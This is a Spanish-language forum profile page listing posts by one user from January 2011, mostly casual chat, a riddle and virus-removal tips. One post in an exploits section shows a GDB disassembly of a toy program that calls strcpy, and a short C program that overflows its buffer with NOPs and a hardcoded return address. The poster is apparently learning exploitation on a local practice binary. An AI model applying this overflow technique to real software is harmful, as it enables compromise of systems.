Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Garfield07

#712
Sí pero asi la gente no programará estructuradamente, ni pensará otras formas de hacer las cosas... no puede ser. es como los programas de programación de malware  :(
#713
fff no me habia dado cuenta buena!
Cita de: leosaldi en  7 Enero 2011, 19:59 PM
2 - Le pregunté a Ricardito:
- ¿Habrá alguna palabra española, de menos de ocho letras, que tenga tres enes?
Pensó un rato y me contestó. Pero de su respuesta no supe si Ricardito me había respondido que sí o que no. ¿Qué me dijo?
]
Nanai xD mi madre la usa mucho...
#714
Seguridad / Re: Virus de red =(
8 Enero 2011, 19:42 PM
Pues pienso que no merece la pena, pero...
1) Analiza todo el equipo con tu AV.
2) Mira, remira (y quita algunas ) entradas del registro de ejecución. El MSN no es imprenscindible xD.
3) Log Hijackthis? Viene bien xD
4) Postea los resultados.

Suerte!
#715
Quien lo esta probando? Cuando va a salir?  :-* ya lo quiero ver...
#716
Bugs y Exploits / Re: ¿¿¿ Mensaje GDB ???
8 Enero 2011, 19:36 PM
Cita de: Anon en  7 Enero 2011, 21:36 PM
compila el programa sin informacion de depuracion y pega el codigo en asm. te lo da el disas main.
Sin? Ahora mismo lo pruebo...


0x08048464 <main+0>: lea    ecx,[esp+0x4]
0x08048468 <main+4>: and    esp,0xfffffff0
0x0804846b <main+7>: push   DWORD PTR [ecx-0x4]
0x0804846e <main+10>: push   ebp
0x0804846f <main+11>: mov    ebp,esp
0x08048471 <main+13>: push   ecx
0x08048472 <main+14>: sub    esp,0x24
0x08048475 <main+17>: mov    DWORD PTR [ebp-0x1c],ecx
0x08048478 <main+20>: mov    eax,DWORD PTR [ebp-0x1c]
0x0804847b <main+23>: cmp    DWORD PTR [eax],0x2
0x0804847e <main+26>: je     0x8048489 <main+37>
0x08048480 <main+28>: mov    DWORD PTR [ebp-0x18],0x1
0x08048487 <main+35>: jmp    0x80484af <main+75>
0x08048489 <main+37>: mov    edx,DWORD PTR [ebp-0x1c]
0x0804848c <main+40>: mov    eax,DWORD PTR [edx+0x4]
0x0804848f <main+43>: add    eax,0x4
0x08048492 <main+46>: mov    eax,DWORD PTR [eax]
0x08048494 <main+48>: mov    DWORD PTR [esp+0x4],eax
0x08048498 <main+52>: lea    eax,[ebp-0x8]
0x0804849b <main+55>: mov    DWORD PTR [esp],eax
0x0804849e <main+58>: call   0x8048374 <strcpy@plt>
0x080484a3 <main+63>: call   0x8048344 <getchar@plt>
---Type <return> to continue, or q <return> to quit---
0x080484a8 <main+68>: mov    DWORD PTR [ebp-0x18],0x0
0x080484af <main+75>: mov    eax,DWORD PTR [ebp-0x18]
0x080484b2 <main+78>: add    esp,0x24
0x080484b5 <main+81>: pop    ecx
0x080484b6 <main+82>: pop    ebp
0x080484b7 <main+83>: lea    esp,[ecx-0x4]
0x080484ba <main+86>: ret   


Y mi idea es que el EBP no va en la pila...
Le meto este exploit...

#include <stdio.h>
#include <string.h>

int main ()
{
char  nops [4];
memset (nops, '\x90', 4);
char ret [4] = "\xbb\x84\x04\x08";

char command [19];
strcpy (command, "./vuln ");
strcat (command, nops);
strcat (command, ret);
system (command);

return 0;
}

Se me ha ocurrido una cosa...
Le meto cuatro nops, que son para el buffer, y listo. Sin EBP. Los 4 NOPS y ret. El ret apunta a una funcion que no se llega a ejecutar con un printf y un exit. Es sencillo. Solo ejecutar ese printf. Sin embargo... Fallo de segmentación, no se cuantos nops meterle, si 4, 8, 12...
Voy a probar otra cosa y posteo...
#717
Bugs y Exploits / Re: ¿¿¿ Mensaje GDB ???
8 Enero 2011, 19:25 PM
Sep, lo tengo desactivado por cuestiones de dificultad :P aun no puedo
#718
+1 muy cierto buitre de acuerdo 100%. De todos modos a veces quiero que se acabe y que me pillo en un buen momento...
#719
Bah, mejor compra ahora, porque el precio saldra disparado si te esperas :P ya vale suficiente  :¬¬ por muy bueno que sea, que nadie lo duda
#720
Bueno... repasando  ;D Si es asi, solo puede ser un firewall de los buenos o un server completito  :silbar:

A no ser que hayas sacado la IP de un mal sitio  :P a ver si te metes con la CIA xD...
De donde sacastes tu IP?